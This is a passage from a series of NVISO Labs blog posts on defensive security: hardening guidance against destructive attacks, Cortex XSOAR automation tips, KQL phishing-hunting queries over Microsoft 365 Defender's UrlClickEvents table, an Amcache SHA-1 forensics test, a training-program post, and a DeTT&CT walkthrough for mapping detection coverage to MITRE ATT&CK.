Each organization should review their own threat model with regards to the potential threats facing them, however, the below is a good overview to improve your security posture against a variety of (destructive) attacks.

Your external exposure

It is advised to perform a periodic assessment on your external perimeter to identify what systems and services are exposed to the internet. Given the cloud first approach many organizations are taking, it has become less straight forward of identifying what services your organization is exposing to the internet, however, attack surface monitoring solutions can provide an answer to that by looking beyond the scope of your organization IP range.

For all identified services exposed to the internet, ensure:

  • Validate these are actually required to be exposed to the internet;
  • They are up to date with the latest security patches.

For all services for which authentication is required (e.g. VPN solutions, access to your client portal, etc.) it is strongly advised to enforce Multi Factor Authentication (MFA).

Abuse of (privileged) accounts

Once inside your network, threat actors are very frequently seen going after privileged accounts (can be local admin accounts or privileged domain accounts).

In terms of local admin accounts, it is important to ensure these accounts have strong passwords assigned to them, and that no password re-use is performed across different hosts. Each local administrator account as such should have a unique strong password assigned to it. Various tools exist that can support in the automated configuration of these unique passwords for each of these accounts. A good example that can be used is Microsoft’s Local Administrator Password Solution (LAPS).

For privileged domain accounts (e.g. a specific server administrator, the domain administrator or the accounts that have access to your security tooling such as EDR’s), it is strongly advised to implement MFA.

Lateral Movement

Once the adversary has obtained access into the environment, they’ll move laterally to eventually gain access to the critical assets of the organization. The following are a number of key recommendations to help in the prevention of successful lateral movement:

  • Implement network segmentation and restrict the communication flows between segments only to the ones required for business reasons;
  • Configure host-based firewalls to restrict inbound connections (depending on your business, a few questions to ask could be: should I allow inbound SMB on my workstations, should an inbound RDP connection be possible from another workstation, etc.)
  • Harden RDP configuration by:
    • Denying server or Domain Administrator accounts from authenticating to workstations;
    • Enforcing Multi-Factor Authentication (MFA);
    • Where possible, use Remote Credential Guard or Restricted Admin.

In addition to the implementation of key hardening principles, the lateral movement phase of an attack is also an opportunity in which adversaries can be detected. Monitoring should be performed on workstation-to-workstation traffic and authentications, usage of RDP and WMI, as well as commonly used lateral movement tools such as PsExec, WinRM and PS Remoting.

Mandiant has additionally provided guidance on protecting against destructive attacks [20](PDF).

Critical Assets

In several cases, the adversaries have been observed conducting destructive attacks. As a proactive measure, ensure offline backups of your critical assets (such as your Domain Controllers) are created regularly. A frequent overlooked aspect of a backup strategy is the restore tests. On a frequent basis, it should be verified that the backup can effectively be restored to a known good state.

On a final note, given that the majority of systems are virtualized these days, it’s important to ensure the access to your back-end virtualization environment is properly segmented and secured.

Phishing Prevention

A number of the observed attacks that Russia linked threat actors have executed were initiated via a phishing campaign with the goal of stealing user credentials or executing malware on the systems. As such, it is important to verify the hardening settings of your mail infrastructure. Some key elements to take into account are:

  • Enable MFA on all mailboxes;
  • Disable legacy protocols that do not understand MFA and as such would allow an adversary to bypass this security control;
  • Perform sandbox execution of all attachments received via mail;
  • Enable safe links (various mail security provides provide this option) to have the URL checked for phishing markers once the user clicks.

Additionally, it is frequently observed that the adversaries are attempting to have a user enable Macros in the malicious office documents they send. It is advised to review if all users within your environment use Office Macros and whether or not these can be disabled. If Macros are used for business reasons, consider only allowing signed Macros.

DDOS Mitigations

Depending on your organization’s risk profile, there is the potential threat of a DDoS attack, especially following sanctions imposed on Russia in specific sectors. It is advised to investigate and implement DDoS mitigations on critical public-facing assets. Noteworthy is Google’s Project Shield [19], which is “a free service that defends news, human rights and election monitoring sites from DDoS attacks”. Google has recently expanded protection for Ukraine, and is already protecting more than 150 websites hosted in Ukraine.

Crisis & Incident Management

Tabletop exercises are a great way of measuring the crisis & incident management processes & procedures you currently have, and to identify any potential gaps that may be uncovered during a tabletop. Moreover, tabletops are cross-functional and can be used for both leadership, as well as anyone working with incidents on a day to day basis. The results of a tabletop exercise can ultimately be used as a platform to improve the current way of working, or to invest in new resources should there be a need.

About the authors

Bart Parys Bart is a manager at NVISO where he mainly focuses on Threat Intelligence and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart loves to and has written many TI reports on multiple levels such as strategic and operational across a wide variety of sectors and geographies.
Robert Nixon Robert is a manager at NVISO where he specializes in Cyber Threat Intelligence at the tactical, organizational and strategic level. He also is an SME in automation, CTI infrastructure, malware analysis, DFIR, and SIEM integrations/use case development.
Michel Coene Michel is a senior manager at NVISO where he is responsible for our CSIRT & TI services with a key focus on (and very much still enjoys hands on) incident response, digital forensics, malware analysis and threat intelligence.

Our goal is to provide fast, concise and actionable intelligence on critical cyber security incidents. Your comments and feedback are very important to us. Please do not hesitate to reach out to [email protected].


Cortex XSOAR Tips & Tricks

By: wstinkens
2 March 2022 at 08:55


With our Managed Detect and Respond (MDR) service, NVISO provides a managed Security Operations Center (SOC) for a large variety of clients across different industries. Since the beginning of this service, we had an “automate first” principle where we tried to automate as much of the repetitive tasks of the SOC analysts as possible, to allow them to focus on actionable security alerts to faster detect attackers in the environment of our customers.

To achieve this goal, NVISO has implemented Palo Alto Cortex XSOAR as its SOAR platform of choice and branded it as the NITRO platform. Cortex XSOAR is the market leader in security automation platforms and the most capable platform currently available. Additionally to the automated workflows created for its managed SOC, NVISO has developed a range of NITRO services on top of Cortex XSOAR such as adversary emulation, vulnerability management and SIEM use case management.

While developing these solutions on Cortex XSOAR, our R&D and SOAR engineering teams have gained a lot of expertise on the platform which we want to share with you in this blog post series. In each post, we will in detail discuss a technical topic together with code snippets, example playbooks or automations you can use in your own Cortex XSOAR environment.

All content will be available in our NVISO Github:

All future posts will be added to the following series:

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Cortex XSOAR Tips & Tricks – Execute Command Function

By: wstinkens
2 March 2022 at 08:56


When developing the automated SOC workflows for the NVISO Managed SOC and the additional NITRO services on Cortex XSOAR, we have started to make use of automations to do complex tasks instead of playbooks. Automations have much better performances and, if your team has a decent level of Python skills, developing complex tasks in automations can be much easier than playbooks.

When using automations in Cortex XSOAR, the command you will call most often is demisto.executeCommand. This is used to execute available commands from integrations and to call other automations.

To add additional functionality to this command, we have created our own nitro_execute_command wrapper function which is available on the NVISO Github:


When  using demisto.executeCommand to run commands in an automation, the first issue you will come across is that it does not return an error when the command execution was unsuccessful. The execution status of the command that has run can be find in the Type key of the returned result of demisto.executeCommand:

        'ModuleName': 'CustomScripts', 
        'Brand': 'Scripts', 
        'Category': 'automation', 
        'ID': '', 
        'Version': 0, 
        'Type': 1, 
        'Contents': None

In our nitro_execute_command function, we loop through all returned results from demisto.executeCommand and check the Type key value. If the value is Error (4), we raise an exception with the error message:

raise Exception(f"Error when executing command: {command} with arguments:{args}: {error_result.get('Contents')}")

Because in certain use cases, you might not want your automation to halt whenever a command was unable to run successfully, we have added a fail_on_error boolean parameter to nitro_execute_command:

nitro_execute_command(command='setIncident', args={'name': 'incident name'}, fail_on_error=False)

To improve the resiliency of our set of automations, we have additionally added retry logic when the execution of a command returns an error. In case of an error, the nitro_execute_command function retries by default 3 times before raising an exception and halting the automation. This can be configured with the retry parameter of nitro_execute_command:

nitro_execute_command(command='setIncident', args={'name': 'incident name'}, retry=5)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_command in all your custom automations.


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

Wouter via his LinkedIn page.

Drilling down on phishing campaigns with UrlClickEvents

4 March 2022 at 11:05


On March 2nd 2022, I observed a new Advanced Hunting table in Microsoft 365 Defender: UrlClickEvents

Figure 1 – UrlClickEvents table

At time of writing, this table is not yet present in every Office 365 tenant, and the official documentation does not contain information about it. A quick peak at the events it contains shows that it logs URLs on which users clicked from Office applications, such as Outlook and Teams. It also logs if the click was allowed or blocked by Safe links, and if the user clicked through the potential warning page (if this setting is configured in Safe Links).

Here is the table format:

  • Timestamp: the timestamp at which the user clicked on the link;
  • Url: the URL that was clicked on by the user;
  • ActionType: indicates whether the click was allowed by Safe Links or not (values observed: ClickAllowed, ClickBlocked, UrlErrorPage, ClickBlockedByTenantPolicy);
  • AccountUpn: the User Principal Name of the account that clicked on the link;
  • Workload: the application from which the user clicked on the link (values observed: Email, Office, Teams);
  • NetworkMessageId: the unique identifier for the email that contains the clicked link, generated by Microsoft 365;
  • IPAddress: public IP address from which the user clicked on the link;
  • IsClickedThrough: indicates whether the user clicked through the potential Safe Links warning page (if this setting is configured in Safe Links);
  • UrlChain: appears to contain the list of redirect URLs, from our test data;
  • ReportId: value that “enables lookups for the original records”, according to the official documentation.

While URL clicks were already available in 365 Defender’s Threat Explorer dashboard for investigation (formerly in Office 365 ATP Threat Explorer), the availability of this data in Advanced Hunting opens new opportunities for hunting queries, custom detection rules and investigation.

Hunting Queries

Click on link that contains an unusual port

| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| extend ParsedUrl = parse_url(tostring(Url))
| where ParsedUrl.Port !in ("", "443")
| where ParsedUrl.Host !endswith "<yourdomain>"
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Parse the URL to extract the host, port, path, etc.;
  • Exclude URLs whose TCP port is empty, or equal to 443;
  • Exclude URLs whose host ends with the domain dame of your organisation (this is to limit false-positive results);
  • Display the results.

Click on link where the host is a public IP address

| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| extend ParsedUrl = parse_url(tostring(Url))
| where ipv4_is_private(tostring(ParsedUrl.Host)) == False
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Parse the URL to extract the host, port, path, etc.;
  • Filter on URLs where the host is not a private IP address;
  • Display the results.

Custom Detection Rule

Click on link containing your domain name in base64-encoded format

| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| where Redirects > 0
| where Url contains "<your_base64_encoded_domain>"
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Filter on URLs which redirected the user at least once to another URL (as is often the case in phishing campaigns);
  • Filter on URLs which contain your organization’s domain name in base64-encoded format (as phishing URLs often contain the recipient’s email address in base64-encoded format);
  • Display the results.

Investigation Query (emails)

| <your conditions>
| project Click_Time = Timestamp, NetworkMessageId, Clicked_Url = Url
| join EmailEvents on NetworkMessageId
| project Delivery_Time = Timestamp,  Click_Time, Clicked_Url, RecipientEmailAddress, SenderMailFromAddress, SenderFromAddress, SenderDisplayName, Subject, AttachmentCount, UrlCount

In this query, the following is performed:

  • Filter the UrlClickEvents logs using your conditions, depending on the investigation;
  • Rename columns for better comprehension in the final results, and project the necessary value (NetworkMessageId) used for the future Join operation;
  • Join the EmailEvents table to display additional information for each URL click (e.g. email delivery time, sender details, subject, etc.);
  • Display the results.


This new UrlClickEvents table is an additional tool SOC and threat hunting teams can use to detect phishing campaigns missed by built-in technologies, through hunting and custom detection rules. Additionally, this will help incident responders flag users who accessed phishing links faster than by using Microsoft 365 Defender’s GUI, especially for extensive phishing campaigns.

About the author

Thibaut Flochon
Thibaut is an intrusion analyst within NVISO’s CSIRT & SOC team. He enjoys investigating security incidents, writing detection rules, and talking about preventive security controls.

Amcache contains SHA-1 Hash – It Depends!

7 March 2022 at 09:00

If you read about the Amcache registry hive and what information it contains, you will find a lot of references that it contains the SHA-1 hash of the file in the corresponding registry entry. Now that especially comes in handy if files are deleted from disk. You can use the SHA-1 extracted from the Amcache to search indicator of compromise lists or simply on the internet in general.

I recently came across a discussion, where someone was asking about an explanation of SHA-1 hashes recorded in Amcache not matching the SHA-1 hash of the actual files. Another person claimed that this can happen, as the SHA-1 hash in Amcache is only calculated for the first 31,457,280 bytes (about 31.4 MB) of large files. Well time to take this to a test.

The Amcache registry hive is typically used in investigations to gain knowledge on executed files. It can be found at the following path: C:\Windows\AppCompat\Programs\Amcache.hve

The executables of 7-Zip and RegistryExplorer were chosen to be candidates for testing. Let’s start by calculating their SHA-1 hashes on disk:

Figure 1: Calculating SHA-1 hashes for files on disk

As you can see, the files have the following SHA-1 hash values:

File name SHA-1 hash
7z.exe 1189CEBEB8FFED7316F98B895FF949A726F4026F
RegistryExplorer.exe E50B8FA6F73F76490818B19614EE8AEFD0AA7A49
Table 1: SHA-1 hashes on disk

If we now execute both files and afterwards acquire the Amcache hive, we can have a look at the recorded values. In this test KAPE was used to acquire the Amcache and Registry Explorer to open it.

Figure 2: Amcache.hve: Root\InventoryApplicationFile\7z.exe|afe683e0fa522625

By reviewing the FileId value and removing the prefix ‘0000’, we can see that this actually is the SHA-1 hash value of the file on disk. But the size of the 7z.exe file is below 31,457,280 bytes.

Figure 3: Amcache.hve: Root\InventoryApplicationFile\registryexplorer|54c8640d4bd6cc38

Doing the same exercise again for RegistryExplorer.exe leads to an expected SHA-1 hash value of: 0f487a4beec16dba123cbc860638223abb51d432 . That value clearly does not match the SHA-1 hash we calculated earlier. The RegistryExplorer.exe file has a file size larger than 31,457,280 bytes.

So if it is true, that the SHA-1 stored in Amcache is calculated at max on the first 31,457,280 bytes of a file, we should be able to get the same result as above.

Figure 4: Getting SHA-1 hash of first 31,457,280 bytes

Above you can see how the dd command was used to get a file containing only the bytes that should be considered for the hash calculation of the Amcache entry. The hashes for both the original file and the stripped file are shown as well.

Putting this all next to each other:

File SHA-1 hash value
Original on disk E50B8FA6F73F76490818B19614EE8AEFD0AA7A49
Amcache entry 0f487a4beec16dba123cbc860638223abb51d432
Stripped file on disk 0f487a4beec16dba123cbc860638223abb51d432
Table 2: Comparing SHA-1 hashes for RegistryExplorer.exe

The SHA-1 hash of the first 31,457,280 bytes matches what is recorded in Amcache. I tested this on Windows 10 and Windows 8, both 64 bit versions, showing exactly the same behaviour.


The testing performed shows that the Amcache records a SHA-1 hash for files, but for larger files only for the first 31,457,280 bytes. This also means that taking the SHA-1 hash from Amcache and search it online has its limitations. The size of the file needs to be taken into account.

Two very basic sayings in digital forensics and incident response have been proven right:

It depends!

Always validate!

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

Keep on running ahead: NVISO’s Training Program

8 March 2022 at 09:00

NVISO is a pure-play specialist in cyber security: with specialists in every area of cyber security, we do everything cyber security and only cyber security. We are known for our customer dedication and our reputation for expertise.

Therefore, when you work for NVISO, we invest heavily in your personal development: to ensure you reach your full potential as a top class cyber security specialist. Expectations are high, but we equip you with the tools, know-how and the faith in your own skills to reach that high standard and guarantee the client’s satisfaction.

We value your personal growth 

Technology and cyber security are changing fast, but thanks to NVISO’s comprehensive training programme, we make sure that you are confident and always ahead of the game. At NVISO we have created a strong learning climate which we have formalised by offering all employees a training budget of 10 000 euros and 10 mandays for every two years. 

Continuous learning through online training platforms 

How to spend that training budget wisely? Well, first of all, NVISO encourages continuous growth by offering employees access to various online training platforms. These platforms challenge you to take your cyber security skills to a next level in a hands-on, gamified and close-to-real-life environment. This way, we keep learning at NVISO practical and engaging.

Hack The Box offers a gigantic pool of virtual penetration testing labs and pro labs setup which simulate a fictional company environment to infiltrate. This allows you to level up your penetration testing and offensive engagement skills, keeping you up to date on the latest attack paths and exploit techniques. 

Hack The Box is where it all started for me in the field of infosec. The main question people usually have about hacking is: “Where do I begin?”. For me, that was also a very difficult question to answer.

Until I came across Hack The Box. Slowly working through retired boxes using walkthrough videos from experienced people like Ippsec allowed me to build a solid base in a wide range of technologies. From there on, moving on to more advanced boxes and eventually pro labs, which simulate a real-life active directory network, was the icing on the cake for me. Furthermore, the platform keeps on growing and continuously adds new features!

At NVISO, we decided to get more out of Hack The Box by holding “Hack for pizza  Nights”. Every other Tuesday, we order food, get some beers, and gather in a group session to crack one or more boxes as a team in our own dedicated lab environment. These game nights allow everyone to learn new techniques and to have some fun with colleagues. Furthermore, NVISO provides new team members access to the Hack The Box Academy, in which they  complete modules and follow tracks focused on a specific topic (e.g. Active Directory, Web pentesting, Cryptography…). This way, new NVISO-members build a strong knowledge base in these subjects.

Firat Acar (Consultant, NVISO Germany)

Secure Code Warrior brings a gamified approach to secure coding. It provides an engaging platform for identifying vulnerabilities inside various coding languages and fixing them. This empowers you to understand the struggles of developers during assessment-driven and threat modelling projects.

Immersive Labs offers– red team or blue team – challenges that place you within real-life cybersecurity scenarios, to keep you in touch with the latest tools and attack techniques. By solving each challenge, you become better prepared to tackle emerging cyber security threats.

We keep learning fun

Learning at NVISO is not only engaging, we keep it fun as well. Every other Tuesday (unless the current regulations dictate otherwise of course), we gather up for our “hack for pizza nights”. During these game nights, we enjoy pizza and beers and hack some boxes together.

In addition, we’re always excited for a good old game of “capture the flag”. In these competitions organized by Hack The Box, we compete with other teams to solve a number of challenges in order to collect flags. The team that collects the most flags the fastest, wins the competition. One of the most fun and engaging ways to enhance your cyber security skills.

SANS Institute: A unique learning opportunity 

NVISO trainings budget also gives you the unique opportunity to participate in the highly renowned SANS-courses. These high-quality and trusted training courses will empower you with the practical skills and knowledge you need to become a top cyber security expert in your area of expertise. Maybe you will meet one of your colleagues in front of the classroom, as the NVISO staff counts several SANS Institute senior instructors and course authors amongst them, who share their expertise with the cyber security world.

DeTT&CT : Mapping detection to MITRE ATT&CK 

9 March 2022 at 09:36


Building detection is a complex task, especially with a constantly increasing amount of data sources. Keeping track of these data sources and their appropriate detection rules or avoiding duplicate detection rules covering the same techniques can give a hard time to detection engineers.

For a SOC, it is crucial to have an good overview and a clear understanding of its actual visibility and detection coverage in order to identify gaps, prioritize the development of new detection rules or onboard new data sources.

In this blog post, we will learn how DeTT&CT can help you build, maintain and score your visibility and detection coverage.

We will first talk about MITRE ATT&CK, which is a knowledge base of adversary TTPs (Tactics, Techniques and Procedures) and its “Navigator”, a matrix that visually describes adversary TTPs. Then, we will cover the structure and functionalities of DeTT&CT. Lastly, we will walk through the different steps to start documenting your own detection coverage.


MITRE ATT&CK is a knowledge base of adversary TTPs based on real-world observations and used by adversaries against enterprise networks. While ATT&CK does cover some tools and software used by attackers, the focus of the framework is on how adversaries interact with systems to accomplish their objectives.

ATT&CK contains a set of techniques and sub-techniques organized into a set of tactics. Tactics represent the “why” of an ATT&CK technique, the adversary’s tactical objective for a particular action. Such tactical objective can be to gain initial access, achieve persistence, move laterally, exfiltrate data, and so on.

Techniques and sub-techniques represent “how” an adversary achieves a tactical objective. As an example, an adversary may create a new Windows service to repeatedly execute malicious payloads and to persist even after a reboot. There are many ways or techniques to achieve a tactical objective.

These tactics and techniques are represented in a matrix containing, at the time of writing, 14 tactics and 188 techniques.

Figure 1: MITRE ATT&CK matrix

Nowadays, MITRE ATT&CK is firmly established with security professionals and forms a common vocabulary both for offense and defense. Adversary emulation teams use it to plan engagements and create scenarios based on realistic techniques used by real-world adversaries, detection teams use ATT&CK to assess their detection coverage and find gaps in their defenses, and cyber threat intelligence (CTI) teams track adversaries and threat actor groups by their use of TTPs mapped to the ATT&CK framework.

MITRE ATT&CK™ contains plenty of valuable information on:

  • TTPs (Tactics, Techniques and Procedures)
  • Groups (threat actors)
  • Software (software used by threat actors)
  • Data sources (visibility required for detection)
  • Mitigations

The relationship between these types of information can be visualised using the following diagram:

Figure 2: Relationship of entities within ATT&CK

To help us visualise this matrix and highlight TTPs, MITRE provides a web interface called ATT&CK Navigator. There is an online instance allowing you to easily and quickly test its functionalities. But, if you intend to use it for more than testing, we highly recommend to have your own instance.

To install a local instance, clone the GitHub repository and follow the procedure as described in the documentation (

Figure 3: ATT&CK Navigator

Even though we could use the ATT&CK Navigator to document our detection coverage, it lacks more complex functionalities such as a multi-level scoring, differentiation between visibility and detection and  separation based on platforms and data sources.

This gap is where DeTT&CT comes into play. Let us discover how this tool works and how it can help us build, maintain and score our visibility and detection coverage.



DeTT&CT stands for Detect Tactics, Techniques & Combat Threats. This framework has been created  at the Cyber Defence Center of Rabobank and is developed and at the time of writing maintained by Marcus Bakker and Ruben Bouman.

The purpose of DeTT&CT is to assist blue teams using MITRE ATT&CK to score and compare data log source quality, visibility coverage and detection coverage. By using this framework, blue teams can quickly detect gaps in the detection or visibility coverage and prioritize the ingest of new log sources.


DeTT&CT delivers a framework than can map the information you have on the entities available in ATT&CK and help you manage your blue teams data, visibility, and detection coverage.

The DeTT&CT framework consists of different components:

  • a Python tool (DeTT&CT CLI)
  • YAML administration files
  • the DeTT&CT Editor (to create and edit the YAML administration files)
  • scoring tables for detections, data sources and visibility

DeTT&CT CLI is a python script ( that works with six different modes:

  • editor: start DeTT&CT editor web interface
  • datasource (ds): data source mapping and quality
  • visibility (v): visibility coverage mapping based on techniques and data sources
  • detection (d): detection coverage mapping based on techniques
  • group (g): threat actor group mapping
  • generic (ge): includes: statistics on ATT&CK data source and updates on techniques, groups and software

You can either use the command line interface or launch the editor to create and manage the different YAML administration files.

The DeTT&CT Framework uses YAML files to administer data sources, visibility, techniques and groups. The following file types can be identified:

  • Data sources administration
  • Technique administration (visibility and detection coverage)
  • Groups administration

We will talk about these administration files in a bit.

You can find administration file sample in the Github repository.

One of the first step in using DeTT&CT is making an inventory of your data sources by scoring the data quality.

Data sources

Data sources are the raw logs or events generated by systems, e.g., security appliances, network devices, and endpoints. ATT&CK has over 30 different data sources which are further divided into over 90 data components. All those data components are included in this framework. These data sources are administered within the data source administration YAML file. For each data source, among others, the data quality can be scored. Within ATT&CK, these data sources are listed within the techniques themselves (e.g. T1003 in the Detection section).

Figure 4: ATT&CK Data source example

The data source scoring is based on multiple criteria from the data quality scoring table:

  • Data completeness
  • Data field completeness
  • Timeliness
  • Consistency
  • Retention
Figure 5: Data source quality scoring table


Visibility is used within DeTT&CT to indicate if you have sufficient data sources with sufficient quality available to be able to capture evidence for activities associated with ATT&CK techniques. Visibility is necessary to perform incident response, execute hunting investigations and build detections. Within DeTT&CT you can score the visibility coverage per ATT&CK technique. The visibility scores are administered in the technique administration YAML file.

Visibility scores are rated from 0 to 4:

Figure 6: Visibility scoring table


Only when you have the right data sources with adequate data quality and available to you for data analytics, your visibility can be used to create new detections for ATT&CK techniques. Detections often trigger alerts and are hence followed up on by your blue team. Scoring and administering your detections is also done in the technique administration YAML file.

Detection scores are rated from -1 to 5:

Figure 7: Detection scoring table

You can assess the score of a detection based on the following table:

Figure 8: Detection scoring details


Let us now walk through the different steps to build detection coverage and perform gap analysis against a threat actor group. First, we need to install DeTT&CT.


You can easily install DeTT&CT, either using an image from Docker Hub or installing it locally. As for ATT&CK Navigator, we strongly suggest installing DeTT&CT locally if you are documenting your own organization’s detection coverage.

To install it locally, clone the repo from Github and install the required packages. You also need to have Python 3.6 or higher.


To install DeTT&CT, run the following commands:

git clone DeTTECT
pip install -r requirements.txt

Once it is installed, you can either use the command line interface or launch the DeTT&CT Editor.

To launch DeTT&CT Editor, type in the following command:

python3 e
  • e: start DeTT&CT editor locally
Figure 9: Launching DeTT&CT Editor

This will automatically launch a web browser the editor interface.

Figure 10: DeTT&CT Editor interface

Data source coverage

ATT&CK has over 30 different data sources, which are further divided into over 90 data components. All of the data components are included in this framework.

Using the YAML data source administration file you can administer your data sources and record the following:

  • The date when you registered the entry in DeTT&CT
  • The data when you connected the data source to your security data lake
  • In which product(s) the data resides
  • The type of system(s) the data source applies to
  • A flag to indicate if the data source can be used in data analytics
  • A possible comment
  • Data quality

In addition to the pre-defined fields, you can add further information by using key-value pairs.

Let us first list our data sources using the DeTT&CT Editor.

Go to DeTT&CT Editor, select Data Sources and create a new file.

Figure 11: Configuring data source administration file

Then add data sources according to the data sources that you already have available.

Click “Add data source” and select one data source. MITRE ATT&CK data sources are documented on their website.

For example, let’s say that you have an EDR installed on your Windows and Linux endpoints. This EDR has the capability to monitor processes so we can add Process Creation data source.
Select the date since you are collecting this data source and the date you registered the data source in your data sources YAML file.

Figure 12: Setting up data sources

Keeping track of the dates can help you monitor your data source improvement. To generate a graph based on the data source administration file, you can run the command below:

python ds -fd sample-data/data-sources-endpoints.yaml -g
Figure 13: Data sources improvement graph

The same kind of graph can be generated for visibility and detection improvement.

Enabling the switch “Data source enabled” to yes will set all data quality scores to 1. If you want your configuration to be more accurate, you can modify these values according to the data source quality scoring table.

Enable the “Available for data analytics” switch if you centralized logs in a SIEM for example.

You could also add “Process Creation” to your data sources if you collect Sysmon event ID (EID) 1 or Windows EID 4688 events for example.

Let’s add the following data sources to complete our example:

  • Command Execution (Windows EID 4688 of cmd.exe, Powershell logging, bash_history, etc.)
  • Windows Registry Key Creation (EDR, Windows EID 4656 or Sysmon EID 12, etc.)
  • Network Traffic Flow (Netflow, Zeek logs, etc.)

Once you have added all your data sources, save your data source administration file by clicking on “Save YAML file”.

Figure 14: Saving your data source administration file

Now, we are going to convert this YAML file to a JSON file using the DeTT&CT CLI tool and load this JSON file as an ATT&CK layer into ATT&CK Navigator.

python3 ds -fd ~/Downloads/data-sources-new.yaml -l

The relevant flags for this command are

  • ds: select data source mode
  • -fd: path to the data source administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator

Go to the ATT&CK Navigator web page and select Open Existing Layer. Choose “Upload from local” and select the JSON file we just created using the command above.

Figure 15: MITRE ATT&CK Navigator
Figure 16: Data source coverage

This layer represents the MITRE ATT&CK mapping based on the data sources that we specified in our data source administration file.

The colours, as explained in the legend, represent the percentage of data sources available for that particular technique.

Let’s look at some techniques from the Privilege Escalation tactic.

Figure 17: ATT&CK technique example

As an example, the Logon Script (Windows) technique requires the following data source coverage:

  • Windows Registry Key Creation
  • Process Creation
  • Command Execution

Fortunately for us, we already have all three data sources available.

Figure 18: ATT&CK Technique data source coverage

But, the Network Logon Script requires the following data sources:

  • Process Creation
  • Command Execution
  • Active Directory Object Modification
  • File Modification

As we only have 2 data sources available, the ATT&CK layer shows a coverage of 26-50%.

Figure 19: Missing data sources

If you would like to improve the coverage for this particular technique, you would now know which data sources you need to integrate next in your detection.

Using the ATT&CK Navigator, you can also compare this data source layer with a threat analysis ATT&CK layer to spot gaps in your detection based on that threat analysis. You can also compare it to another data source layer to emphasize the benefits of integrating an additional data source in your detection.

Visibility coverage

The next step is to have a good understanding of where we have visibility, the level of visibility and where we lack visibility.

To get started, we can generate a technique administration YAML file based on our data source administration file, which will give us rough visibility scores. By default the argument --yaml will only include techniques in the resulting YAML for which the visibility score is greater than 0. To include all ATT&CK techniques that apply to the platform(s) specified in the data source YAML file, add the argument: --yaml-all-techniques.

python3 ds -fd ~/Downloads/data-sources-new.yaml --yaml


python3 ds -fd ~/Downloads/data-sources-new.yaml --yaml --yaml-all-techniques

The relevant flags for this command are

  • ds: select data source mode
  • -fd: path to the data source administration YAML file
  • --yaml: generate a technique administration YAML file with visibility scores based on the number of available data sources
  • --yaml-all-techniques: includes all ATT&CK techniques in the generated YAML file that apply to the platform(s) specified in the data source YAML file (you need to provide the --yaml argument for this)
Figure 20: Visibility coverage generation

Within the resulting YAML file, you can adjust the visibility score per technique based on expert knowledge or based on the quality of a particular data source.

If you want to easily edit the technique administration YAML file, you can load it using DeTT&CT Editor.

Figure 21: Technique administration file example

Per technique, you can see and edit the rough visibility score assigned based on the data source administration file. If needed, you can assign different score for different platforms such as Windows, Linux, Network, or Cloud.

Figure 22: Technique visibility score

The score logbook will keep track of the changes within the score.

To visualize the visibility scores within an ATT&CK Navigator layer, run the following command and load the resulting file in ATT&CK Navigator.

python3 v -ft ~/Downloads/techniques-administration-example-all.yaml -l

The relevant parameters and flags for this command are

  • v: visibility coverage mapping based on techniques and data sources
  • -ft: path the technique administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator
Figure 23: Visibility coverage layer
Figure 24: ATT&CK visibility coverage

Detection coverage

Now that we listed our data sources and have a good understanding of our visibility, we need to have a good understanding of where we have detection, the level of detection and the lack of detection we have.

Using the same YAML data source administration file we used for our visibility coverage we can administer our level of detection and record the following:

  • The type of system(s) the detection applies to (e.g. Windows endpoints, Windows servers, Linux servers, crown jewel x, etc.).
  • Where the detection resides (for example, it could be an event ID, the name of a detection rule/use case, SIEM, or a product name)
  • A possible comment.
  • The date when the detection was implemented or improved.
  • A detection score.

In addition to the pre-defined fields, you can add further information by using key-value pairs.

To allow detailed scoring of your detections per type of system, you can select multiple detections per technique in the YAML file. This can be achieved using the “applicable_to” property.

Figure 25: Technique administration – Applicable to

We recommend using the same applicable_to values between your technique and your data source administration file. A score logbook enables you to keep track of changes in the score by having multiple score objects.

Figure 26: Technique administration – Score logbook

To review the details, click on the “Score logbook” button:

Figure 27: Technique administration – Score logbook details
Figure 28: Technique detection score

Do not forget to save your YAML file is you edit it with DeTT&CT Editor.

To generate a layer file for the ATT&CK Navigator based on the technique administration file, you can run the following command:

python3 d -ft ~/Downloads/techniques-administration-example-all.yaml -l

The relevant parameters and flags for this command are

  • d: detection coverage mapping based on techniques
  • -ft: path the technique administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator
Figure 29: Detection layer

As we gave a score to only one specific technique, then only this technique will appear in our layer.

Figure 30: ATT&CK Detection coverage

Gap analysis against threat actor group

Additionally, you could compare your detection layer with your threat analysis layer or with a layer generated for a specific red team exercise to spot any gaps in your detection.

